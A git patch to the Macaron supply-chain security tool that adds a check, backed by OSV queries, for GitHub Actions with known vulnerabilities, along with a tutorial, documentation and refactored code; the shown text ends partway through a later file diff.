From 9776ec80554517bb79e84d9ee508f5d1db12837e Mon Sep 17 00:00:00 2001 From: behnazh-w Date: Fri, 21 Mar 2025 17:35:35 +1000 Subject: [PATCH] feat: detect vulnerable GitHub Actions Signed-off-by: behnazh-w --- docs/source/glossary.rst | 5 + docs/source/index.rst | 21 +- .../pages/cli_usage/command_analyze.rst | 2 +- ...macaron.slsa_analyzer.package_registry.rst | 20 +- .../detect_vulnerable_github_actions.rst | 202 +++++++++ docs/source/pages/tutorials/index.rst | 1 + src/macaron/config/defaults.ini | 6 + src/macaron/database/db_custom_types.py | 102 ++++- src/macaron/repo_finder/repo_finder.py | 45 +- .../checks/detect_malicious_metadata_check.py | 51 +-- .../github_actions_vulnerability_check.py | 193 +++++++++ .../ci_service/github_actions/analyzer.py | 6 +- src/macaron/slsa_analyzer/git_url.py | 78 +++- .../slsa_analyzer/package_registry/osv_dev.py | 395 ++++++++++++++++++ .../oracle-macaron/check_results_policy.dl | 11 + .../test.yaml | 13 +- .../policy_purl.dl} | 1 + .../policy_repo_url.dl | 10 + .../cases/org_apache_logging_log4j/test.yaml | 33 ++ .../Bradford1040_mainsail_check_locale.yml | 60 +++ .../tj-actions_changed-files_query.json | 229 ++++++++++ .../tj-actions_changed-files_querybatch.json | 19 + .../test_detect_malicious_metadata_check.py | 6 +- ...test_github_actions_vulnerability_check.py | 105 +++++ .../package_registry/test_osv_dev.py | 220 ++++++++++ 25 files changed, 1721 insertions(+), 113 deletions(-) create mode 100644 docs/source/pages/tutorials/detect_vulnerable_github_actions.rst create mode 100644 src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py create mode 100644 src/macaron/slsa_analyzer/package_registry/osv_dev.py create mode 100644 tests/integration/cases/oracle-macaron/check_results_policy.dl rename tests/integration/cases/{log4j_release_pipeline => oracle-macaron}/test.yaml (56%) rename tests/integration/cases/{log4j_release_pipeline/policy.dl => org_apache_logging_log4j/policy_purl.dl} (94%) create mode 100644 tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl create mode 100644 tests/integration/cases/org_apache_logging_log4j/test.yaml create mode 100644 tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml create mode 100644 tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json create mode 100644 tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json create mode 100644 tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py create mode 100644 tests/slsa_analyzer/package_registry/test_osv_dev.py diff --git a/docs/source/glossary.rst b/docs/source/glossary.rst index 72c36afce..4be476803 100644 --- a/docs/source/glossary.rst +++ b/docs/source/glossary.rst @@ -23,3 +23,8 @@ Glossary * Witness is a tool that wraps a build command and records various types of information in a provenance document in the ``in-toto`` format as the build execution happens. * URL: https://github.com/in-toto/witness + + PURL + + * Package URL identifier + * URL: https://github.com/package-url/purl-spec/blob/master/PURL-SPECIFICATION.rst diff --git a/docs/source/index.rst b/docs/source/index.rst index 016f6f544..0e26ddcc5 100644 --- a/docs/source/index.rst +++ b/docs/source/index.rst @@ -46,12 +46,12 @@ Current checks in Macaron The table below shows the current set of actionable checks derived from the requirements that are currently supported by Macaron. -.. list-table:: Mapping SLSA requirements to Macaron checks +.. list-table:: Macaron checks descriptions :widths: 20 40 40 :header-rows: 1 * - Check ID - - SLSA requirement + - Summary - Concrete check * - ``mcn_build_tool_1`` - **Build tool exists** - The source code repository includes configurations for a supported build tool used to produce the software component. @@ -95,19 +95,12 @@ the requirements that are currently supported by Macaron. * - ``mcn_scm_authenticity_check_1`` - **Source repo authenticity** - Check whether the claims of a source code repository made by a package can be corroborated. - If the source code repository contains conflicting evidence regarding its claim of the source code repository, this check will fail. If no source code repository or corroborating evidence is found, or if the build system is unsupported, the check will return ``UNKNOWN`` as the result. This check currently supports only Maven artifacts. - -**************************************************************************************** -Macaron checks that report integrity issues but do not map to SLSA requirements directly -**************************************************************************************** - -.. list-table:: - :widths: 20 40 - :header-rows: 1 - - * - Check ID - - Description * - ``mcn_detect_malicious_metadata_1`` - - This check performs analysis on PyPI package metadata to detect malicious behavior. It also reports known malware from other ecosystems, but the analysis is currently limited to PyPI packages. + - **Malicious code detection** - Check whether the source code or package metadata has indicators of compromise. + - This check performs analysis on PyPI package metadata to detect malicious behavior. It also reports known malware from other ecosystems. + * - ``mcn_githubactions_vulnerabilities_1`` + - **Detect vulnerable GitHub Actions** - Check whether the GitHub Actions called from the corresponding repo have known vulnerabilities. + - This check identifies third-party GitHub Actions used in a repository and reports any known vulnerabilities associated with the used versions. ---------------------- How does Macaron work? diff --git a/docs/source/pages/cli_usage/command_analyze.rst b/docs/source/pages/cli_usage/command_analyze.rst index a04f88bd2..bd42334ed 100644 --- a/docs/source/pages/cli_usage/command_analyze.rst +++ b/docs/source/pages/cli_usage/command_analyze.rst @@ -1,4 +1,4 @@ -.. Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. +.. Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. .. Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. .. _analyze-command-cli: diff --git a/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst b/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst index ae98919bb..36659c1b3 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst @@ -3,8 +3,8 @@ macaron.slsa\_analyzer.package\_registry package .. automodule:: macaron.slsa_analyzer.package_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: Submodules ---------- @@ -14,45 +14,53 @@ macaron.slsa\_analyzer.package\_registry.deps\_dev module .. automodule:: macaron.slsa_analyzer.package_registry.deps_dev :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.jfrog\_maven\_registry module ---------------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.jfrog_maven_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.maven\_central\_registry module ------------------------------------------------------------------------ .. automodule:: macaron.slsa_analyzer.package_registry.maven_central_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.npm\_registry module ------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.npm_registry :members: + :show-inheritance: :undoc-members: + +macaron.slsa\_analyzer.package\_registry.osv\_dev module +-------------------------------------------------------- + +.. automodule:: macaron.slsa_analyzer.package_registry.osv_dev + :members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.package\_registry module ----------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.package_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.pypi\_registry module -------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.pypi_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: diff --git a/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst b/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst new file mode 100644 index 000000000..645ea9a03 --- /dev/null +++ b/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst @@ -0,0 +1,202 @@ +.. Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +.. Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +.. _detect-vuln-gh-actions: + +======================================= +How to detect vulnerable GitHub Actions +======================================= + +This tutorial explains how to use a check in Macaron that detects vulnerable third-party GitHub Actions. This check is important for preventing security issues in your CI/CD pipeline, especially in light of recent incidents, such as vulnerabilities discovered in popular GitHub Actions like `tj-actions/changed-files `_, and `reviewdog/action-setup `_. + +We will guide you on how to enable and use this check to enhance the security of your development pipeline. + +For more information on other features of Macaron, please refer to the :ref:`documentation here `. + +.. contents:: :local: + +------------ +Introduction +------------ + +In March 2025, CISA (Cybersecurity and Infrastructure Security Agency) issued an `alert `_ about a critical supply chain attack affecting third-party GitHub Actions. The incidents, identified as `CVE-2025-30066 `_ and `CVE-2025-30154 `_, targeted the widely used GitHub Actions ``tj-actions/changed-files`` and ``reviewdog/action-setup``, respectively. These actions were compromised, allowing attackers to manipulate CI/CD pipelines and potentially inject malicious code into repositories. + +Macaron now includes a check for detecting vulnerable third-party GitHub Actions that are used in repositories, preventing the potential misuse of these actions. + +------------------------------------------- +The Check: Detect Vulnerable GitHub Actions +------------------------------------------- + +Macaron's check, ``mcn_githubactions_vulnerabilities_1`` identifies third-party GitHub Actions and reports any known vulnerabilities associated with the versions used in your repository. + + +**Key Features of this Check:** + +- **Vulnerability Detection**: It scans the repository’s workflow files and checks for any known vulnerabilities in the GitHub Actions used. +- **Version Checks**: It verifies the versions of the GitHub Actions being used, comparing them against a list of known vulnerabilities. +- **Security Prevention**: Helps prevent security breaches by ensuring that your workflows are free from compromised actions. +- **Continuous Monitoring**: As GitHub Actions are updated, you can enforce a policy to continuously track and address emerging threats, ensuring that your security posture remains up-to-date. + +----------------------------------------------------------- +How to Use the GitHub Actions Vulnerability Detection Check +----------------------------------------------------------- + +****************************** +Installation and Prerequisites +****************************** + +Skip this section if you already know how to install Macaron. + +.. toggle:: + + Please follow the instructions :ref:`here `. In summary, you need: + + * Docker + * the ``run_macaron.sh`` script to run the Macaron image. + * sqlite3 + + .. note:: At the moment, Docker alternatives (e.g. podman) are not supported. + + + You also need to provide Macaron with a GitHub token through the ``GITHUB_TOKEN`` environment variable. + + To obtain a GitHub Token: + + * Go to ``GitHub settings`` → ``Developer Settings`` (at the bottom of the left side pane) → ``Personal Access Tokens`` → ``Fine-grained personal access tokens`` → ``Generate new token``. Give your token a name and an expiry period. + * Under ``"Repository access"``, choosing ``"Public Repositories (read-only)"`` should be good enough in most cases. + + Now you should be good to run Macaron. For more details, see the documentation :ref:`here `. + +*************** +Running Macaron +*************** + +To use the GitHub Actions Vulnerability Detection check in Macaron, you can either provide the repository URL or use the :term:`PURL` of the package. Macaron will automatically resolve the repository if you choose the PURL approach. For more details, refer to the :ref:`CLI options` of the ``analyze`` command. + ++++++++++++++++++++++++++ +Using the Repository Path ++++++++++++++++++++++++++ + +As an example, we will check if the https://github.com/apache/logging-log4j2 repository calls any vulnerable GitHub Actions. First, execute the ``analyze`` command as follows: + +.. code-block:: shell + + ./run_macaron.sh analyze -rp https://github.com/apache/logging-log4j2 + +Next, ensure that the ``mcn_githubactions_vulnerabilities_1`` check passes for the repository. You can create a simple policy like the one below and store it in a file (e.g., ``check_github_actions_vuln.dl``): + +.. code-block:: prolog + + Policy("github_actions_vulns", component_id, "GitHub Actions Vulnerability Detection") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + + apply_policy_to("github_actions_vulns", component_id) :- + is_repo_url(component_id, "https://github.com/apache/logging-log4j2"). + +Run the ``verify-policy`` command to check if the ``mcn_githubactions_vulnerabilities_1`` check is successful. + +.. code-block:: shell + + ./run_macaron.sh verify-policy --database ./output/macaron.db --file ./check_github_actions_vuln.dl + +++++++++++++++ +Using the PURL +++++++++++++++ + +Alternatively, run the ``analyze`` command with the PURL of a package: + +.. code-block:: shell + + ./run_macaron.sh analyze -purl pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 + +Then, ensure that the ``mcn_githubactions_vulnerabilities_1`` check passes for the component. You can create a similar policy to the one shown earlier and store it in a file (e.g., ``check_github_actions_vuln.dl``): + +.. code-block:: prolog + + Policy("github_actions_vulns", component_id, "GitHub Actions Vulnerability Detection") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + + apply_policy_to("github_actions_vulns", component_id) :- + is_component(component_id, purl), + match("pkg:maven/org.apache.logging.log4j/log4j-core@.*", purl). + +Run the ``verify-policy`` command to verify that the check passes: + +.. code-block:: shell + + ./run_macaron.sh verify-policy --database ./output/macaron.db --file ./check_github_actions_vuln.dl + +****************** +Review the Results +****************** + +Macaron stores the results in a local database and generates HTML and JSON reports. If the ``verify-policy`` step fails, you can retrieve detailed information about the vulnerable repositories from the database. For a quick overview, refer to the HTML report located in the ``output/reports`` directory, such as: + +- ``output/reports/github_com/apache/logging-log4j2/logging-log4j2.html`` (for repository path analysis) +- ``output/reports/maven/org_apache_logging_log4j/log4j-core/log4j-core.html`` (for PURL analysis) + +For comprehensive results, query the local database with the following command: + +.. code-block:: shell + + sqlite3 -json output/macaron.db "SELECT * FROM github_actions_vulnerabilities_check;" | jq + +.. code-block:: json + + [ + { + "id": 1, + "vulnerability_urls": "[\"https://osv.dev/vulnerability/GHSA-mrrh-fwg8-r2c3\"]", + "github_actions_id": "tj-actions/changed-files", + "github_actions_version": "v41", + "caller_workflow": "https://github.com/OWNER/REPO/blob/4d59c62f42b7f5c08e31f6eb401a4e35355fe077/.github/workflows/workflow.yml" + } + ] + +**Output Breakdown:** + +- **id**: Unique identifier for this specific report in the database. +- **vulnerability_urls**: List of URLs pointing to published vulnerability advisories for the identified GitHub Action. +- **github_actions_id**: The identifier of the vulnerable GitHub Action, formatted as ``OWNER/REPO``. +- **github_actions_version**: The version of the GitHub Action that contains the vulnerability. +- **caller_workflow**: URL to the GitHub workflow file that is calling the affected action. + +The output is machine-readable, making it suitable for further analysis, automation, or integration with other security tools. + +.. note:: + + The ``OWNER`` and ``REPO`` in the ``caller_workflow`` field are anonymized to protect the privacy of the repository being analyzed. + +********** +Mitigation +********** + +To mitigate the vulnerability, review the advisory linked in the ``vulnerability_urls`` field and identify the patched version of the GitHub Action. Follow security best practices by pinning the vulnerable action to a fixed version, using the commit SHA for the patched version. This ensures that security updates are incorporated while maintaining the stability of your workflow. + +For example, to pin the ``tj-actions/changed-files`` action to a specific version: + +.. code-block:: yaml + + uses: tj-actions/changed-files@823fcebdb31bb35fdf2229d9f769b400309430d0 # v46.0.3 + +Refer to GitHub's security hardening guide for more information on managing third-party actions securely: `GitHub Security `_. + +--------------------- +Why This is Important +--------------------- + +In the aftermath of the supply chain compromise in March 2025, securing your CI/CD pipeline is more important than ever. GitHub Actions are widely used to automate development processes, but relying on third-party actions that could be compromised poses a significant risk. + +By using the ``mcn_githubactions_vulnerabilities_1`` check in Macaron, you can proactively secure your repositories. It helps identify and mitigate risks early in the development process, ensuring that your workflows are running trusted and secure actions. + +As third-party libraries and tools continue to grow in popularity, security risks from supply chain attacks will only increase. Regularly checking for vulnerabilities in the GitHub Actions used in your projects is an essential step toward maintaining a secure development environment. + +---------- +Conclusion +---------- + +In this tutorial, we've shown you how to use Macaron to detect vulnerable third-party GitHub Actions in your repository. By integrating this check into your pipeline, you can prevent security breaches caused by compromised or vulnerable actions. This is especially important following the recent `CVE-2025-30066 `_ report, which highlights the need for robust security measures in CI/CD pipelines. + +Make sure to stay up to date with Macaron’s security checks to protect your project from emerging threats. + +For more information about using Macaron and other checks, please refer to the full list of our checks: :ref:`here `. diff --git a/docs/source/pages/tutorials/index.rst b/docs/source/pages/tutorials/index.rst index 75869113f..d16c56f70 100644 --- a/docs/source/pages/tutorials/index.rst +++ b/docs/source/pages/tutorials/index.rst @@ -19,6 +19,7 @@ For the full list of supported technologies, such as CI services, registries, an commit_finder detect_malicious_package + detect_vulnerable_github_actions npm_provenance detect_malicious_java_dep generate_verification_summary_attestation diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 0ccad65c4..c575cb76e 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -544,6 +544,12 @@ url_netloc = api.deps.dev url_scheme = https purl_endpoint = v3alpha/purl +[osv_dev] +url_netloc = api.osv.dev +url_scheme = https +query_endpoint = v1/query +querybatch_endpoint = v1/querybatch + # Configuration options for selecting the checks to run. # Both the exclude and include are defined as list of strings: # - The exclude list is used to specify the checks that will not run. diff --git a/src/macaron/database/db_custom_types.py b/src/macaron/database/db_custom_types.py index e67d22b3a..d4edc8075 100644 --- a/src/macaron/database/db_custom_types.py +++ b/src/macaron/database/db_custom_types.py @@ -80,25 +80,115 @@ class DBJsonDict(TypeDecorator): # pylint: disable=W0223 #: :meta private: cache_ok = True - def process_bind_param(self, value: None | dict, dialect: Any) -> None | dict: + def process_bind_param(self, value: None | dict, dialect: Any) -> dict: """Process when storing a dict object to the SQLite db. - value: None | dict - The value being stored. + Parameters + ---------- + value : None | dict + The value to be stored in the database. This should be a dict; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + dict + The processed value, which must be a dict. + + Raises + ------ + TypeError + If the value is not a dict. """ if not isinstance(value, dict): raise TypeError("DBJsonDict type expects a dict.") return value - def process_result_value(self, value: None | dict, dialect: Any) -> None | dict: + def process_result_value(self, value: None | dict, dialect: Any) -> dict: """Process when loading a dict object from the SQLite db. - value: None | dict - The value being loaded. + Parameters + ---------- + value : None | dict + The value loaded from the database. This should be a dictionary; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + dict + The processed value, which must be a dictionary. + + Raises + ------ + TypeError + If the value is not a dictionary. """ if not isinstance(value, dict): raise TypeError("DBJsonDict type expects a dict.") + + return value + + +class DBJsonList(TypeDecorator): # pylint: disable=W0223 + """SQLAlchemy column type to serialize lists.""" + + # It is stored in the database as a json value. + impl = JSON + + # To prevent Sphinx from rendering the docstrings for `cache_ok`, make this docstring private. + #: :meta private: + cache_ok = True + + def process_bind_param(self, value: None | list, dialect: Any) -> list: + """Process when storing a list object to the SQLite db. + + Parameters + ---------- + value : None | list + The value to be stored in the database. This should be a list; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + list + The processed value, which must be a list. + + Raises + ------ + TypeError + If the value is not a list. + """ + if not isinstance(value, list): + raise TypeError("DBJsonList type expects a list.") + + return value + + def process_result_value(self, value: None | list, dialect: Any) -> list: + """Process when loading a list object from the SQLite db. + + Parameters + ---------- + value : None | list + The value loaded from the database. This should be a list; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + list + The processed value, which must be a list. + + Raises + ------ + TypeError + If the value is not a list. + """ + if not isinstance(value, list): + raise TypeError("DBJsonList type expects a list.") + return value diff --git a/src/macaron/repo_finder/repo_finder.py b/src/macaron/repo_finder/repo_finder.py index f98f2688e..b19eb53a0 100644 --- a/src/macaron/repo_finder/repo_finder.py +++ b/src/macaron/repo_finder/repo_finder.py @@ -61,9 +61,9 @@ get_remote_origin_of_local_repo, get_remote_vcs_url, get_repo_dir_name, + get_tags_via_git_remote, is_empty_repo, is_remote_repo, - list_remote_references, resolve_local_path, ) @@ -337,49 +337,6 @@ def get_latest_repo_if_different(latest_version_purl: PackageURL, original_repo: return latest_repo -def get_tags_via_git_remote(repo: str) -> dict[str, str] | None: - """Retrieve all tags from a given repository using ls-remote. - - Parameters - ---------- - repo: str - The repository to perform the operation on. - - Returns - ------- - dict[str] - A dictionary of tags mapped to their commits, or None if the operation failed.. - """ - tag_data = list_remote_references(["--tags"], repo) - if not tag_data: - return None - tags = {} - - for tag_line in tag_data.splitlines(): - tag_line = tag_line.strip() - if not tag_line: - continue - split = tag_line.split("\t") - if len(split) != 2: - continue - possible_tag = split[1] - if possible_tag.endswith("^{}"): - possible_tag = possible_tag[:-3] - elif possible_tag in tags: - # If a tag already exists, it must be the annotated reference of an annotated tag. - # In that case we skip the tag as it does not point to the proper source commit. - # Note that this should only happen if the tags are received out of standard order. - continue - possible_tag = possible_tag.replace("refs/tags/", "") - if not possible_tag: - continue - tags[possible_tag] = split[0] - - logger.debug("Found %s tags via ls-remote of %s", len(tags), repo) - - return tags - - def prepare_repo( target_dir: str, repo_path: str, diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 80439bb79..5bec23b7b 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -5,7 +5,6 @@ import logging -import requests from problog import get_evaluatable from problog.logic import Term from problog.program import PrologString @@ -34,16 +33,16 @@ from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, PyPIRegistry from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo -from macaron.util import send_post_http_raw logger: logging.Logger = logging.getLogger(__name__) class MaliciousMetadataFacts(CheckFacts): - """The ORM mapping for justifications in pypi heuristic check.""" + """The ORM mapping for justifications in malicious metadata check.""" __tablename__ = "_detect_malicious_metadata_check" @@ -71,14 +70,10 @@ class MaliciousMetadataFacts(CheckFacts): class DetectMaliciousMetadataCheck(BaseCheck): """This check analyzes the metadata of a package for malicious behavior.""" - # The OSV knowledge base query database. - osv_query_url = "https://api.osv.dev/v1/query" - def __init__(self) -> None: """Initialize a check instance.""" check_id = "mcn_detect_malicious_metadata_1" description = """This check analyzes the metadata of a package based on reports malicious behavior. - Supported ecosystem for unknown malware: PyPI. """ super().__init__(check_id=check_id, description=description, eval_reqs=[]) @@ -222,8 +217,6 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: package_registry_info_entries = ctx.dynamic_data["package_registries"] # First check if this package is a known malware - data = {"package": {"purl": ctx.component.purl}} - try: package_exists = bool(DepsDevService.get_package_info(ctx.component.purl)) except APIAccessError as error: @@ -231,29 +224,27 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Known malicious packages must have been removed. if not package_exists: - response = send_post_http_raw(self.osv_query_url, json_data=data, headers=None) - res_obj = None - if response: - try: - res_obj = response.json() - except requests.exceptions.JSONDecodeError as error: - logger.debug("Unable to get a valid response from %s: %s", self.osv_query_url, error) - if res_obj: - for vuln in res_obj.get("vulns", {}): - if v_id := json_extract(vuln, ["id"], str): - result_tables.append( - MaliciousMetadataFacts( - known_malware=f"https://osv.dev/vulnerability/{v_id}", - result={}, - detail_information=vuln, - confidence=Confidence.HIGH, - ) + vulns: list = [] + try: + vulns = OSVDevService.get_vulnerabilities_purl(ctx.component.purl) + except APIAccessError as error: + logger.debug(error) + + for vuln in vulns: + if v_id := json_extract(vuln, ["id"], str): + result_tables.append( + MaliciousMetadataFacts( + known_malware=f"https://osv.dev/vulnerability/{v_id}", + result={}, + detail_information=vuln, + confidence=Confidence.HIGH, ) - if result_tables: - return CheckResultData( - result_tables=result_tables, - result_type=CheckResultType.FAILED, ) + if result_tables: + return CheckResultData( + result_tables=result_tables, + result_type=CheckResultType.FAILED, + ) # If the package is not a known malware, run malware analysis heuristics. for package_registry_info_entry in package_registry_info_entries: diff --git a/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py b/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py new file mode 100644 index 000000000..2635e70c7 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py @@ -0,0 +1,193 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains the implementation of the GitHub Actions vulnerabilities check.""" + +import logging +import os + +from sqlalchemy import ForeignKey, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonList +from macaron.database.table_definitions import CheckFacts +from macaron.errors import APIAccessError +from macaron.json_tools import json_extract +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck, CheckResultType +from macaron.slsa_analyzer.checks.check_result import CheckResultData, Confidence, JustificationType +from macaron.slsa_analyzer.ci_service.github_actions.analyzer import GitHubWorkflowNode, GitHubWorkflowType +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class GitHubActionsVulnsFacts(CheckFacts): + """The ORM mapping for justifications in the GitHub Actions vulnerabilities check.""" + + __tablename__ = "_github_actions_vulnerabilities_check" + + #: The primary key. + id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The list of vulnerability URLs. + vulnerability_urls: Mapped[list[str]] = mapped_column( + DBJsonList, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action Identifier. + github_actions_id: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action version. + github_actions_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action workflow that calls the vulnerable GitHub Action. + caller_workflow: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.HREF}) + + __mapper_args__ = { + "polymorphic_identity": "_github_actions_vulnerabilities_check", + } + + +class GitHubActionsVulnsCheck(BaseCheck): + """This Check checks whether the GitHub Actions called from the corresponding repo have known vulnerabilities. + + Note: This check analyzes the direct GitHub Actions dependencies only. + TODO: Check GitHub Actions dependencies recursively. + """ + + def __init__(self) -> None: + """Initialize instance.""" + check_id = "mcn_githubactions_vulnerabilities_1" + description = "Check whether the GitHub Actions called from the corresponding repo have known vulnerabilities.." + depends_on: list[tuple[str, CheckResultType]] = [("mcn_version_control_system_1", CheckResultType.PASSED)] + eval_reqs = [ReqName.SECURITY] + super().__init__(check_id=check_id, description=description, depends_on=depends_on, eval_reqs=eval_reqs) + + def run_check(self, ctx: AnalyzeContext) -> CheckResultData: + """Implement the check in this method. + + Parameters + ---------- + ctx : AnalyzeContext + The object containing processed data for the target repo. + + Returns + ------- + CheckResultData + The result of the check. + """ + result_tables: list[CheckFacts] = [] + + ci_services = ctx.dynamic_data["ci_services"] + + external_workflows: dict[str, list] = {} + for ci_info in ci_services: + for callee in ci_info["callgraph"].bfs(): + if isinstance(callee, GitHubWorkflowNode) and callee.node_type in [ + GitHubWorkflowType.EXTERNAL, + GitHubWorkflowType.REUSABLE, + ]: + if "@" in callee.name: + workflow_name, workflow_version = callee.name.split("@") + else: + # Most likely we have encountered an internal reusable workflow, which + # can be skipped. + logger.debug("GitHub Actions workflow %s misses a version. Skipping...", callee.name) + continue + + caller_path = callee.caller.source_path if callee.caller else None + + if not workflow_name: + logger.debug("Workflow %s is not relevant. Skipping...", callee.name) + continue + + ext_workflow: list = external_workflows.get(workflow_name, []) + ext_workflow.append( + { + "version": workflow_version, + "caller_path": ci_info["service"].api_client.get_file_link( + ctx.component.repository.full_name, + ctx.component.repository.commit_sha, + file_path=( + ci_info["service"].api_client.get_relative_path_of_workflow( + os.path.basename(caller_path) + ) + if caller_path + else "" + ), + ), + } + ) + external_workflows[workflow_name] = ext_workflow + + # If no external GitHub Actions are found, return passed result. + if not external_workflows: + return CheckResultData( + result_tables=[], + result_type=CheckResultType.PASSED, + ) + + # We first send a batch query to see which GitHub Actions are potentially vulnerable. + # OSV's querybatch returns minimal results but this allows us to only make subsequent + # queries to get vulnerability details when needed. + batch_query = [{"name": k, "ecosystem": "GitHub Actions"} for k, _ in external_workflows.items()] + batch_vulns = [] + try: + batch_vulns = OSVDevService.get_vulnerabilities_package_name_batch(batch_query) + except APIAccessError as error: + logger.debug(error) + + for vuln_res in batch_vulns: + vulns: list = [] + workflow_name = vuln_res["name"] + try: + vulns = OSVDevService.get_vulnerabilities_package_name(ecosystem="GitHub Actions", name=workflow_name) + except APIAccessError as error: + logger.debug(error) + continue + for workflow_inv in external_workflows[workflow_name]: + vuln_mapping = [] + for vuln in vulns: + if v_id := json_extract(vuln, ["id"], str): + try: + if OSVDevService.is_version_affected( + vuln, + workflow_name, + workflow_inv["version"], + "GitHub Actions", + source_repo=f"https://github.com/{workflow_name}", + ): + vuln_mapping.append(f"https://osv.dev/vulnerability/{v_id}") + except APIAccessError as error: + logger.debug(error) + if vuln_mapping: + result_tables.append( + GitHubActionsVulnsFacts( + vulnerability_urls=vuln_mapping, + github_actions_id=workflow_name, + github_actions_version=workflow_inv["version"], + caller_workflow=workflow_inv["caller_path"], + confidence=Confidence.HIGH, + ) + ) + + if result_tables: + return CheckResultData( + result_tables=result_tables, + result_type=CheckResultType.FAILED, + ) + + return CheckResultData( + result_tables=[], + result_type=CheckResultType.PASSED, + ) + + +registry.register(GitHubActionsVulnsCheck()) diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py index 2f0e49888..4565c2098 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module provides the intermediate representations and analysis functions for GitHub Actions.""" @@ -368,8 +368,8 @@ def build_call_graph_from_path(root: BaseNode, workflow_path: str, repo_path: st Parameters ---------- - repo_path : str - The path to the repo. + root : BaseNode + The root call graph node. workflow_path: str The path to the CI workflow file. repo_path: str diff --git a/src/macaron/slsa_analyzer/git_url.py b/src/macaron/slsa_analyzer/git_url.py index 603188c5f..57edea230 100644 --- a/src/macaron/slsa_analyzer/git_url.py +++ 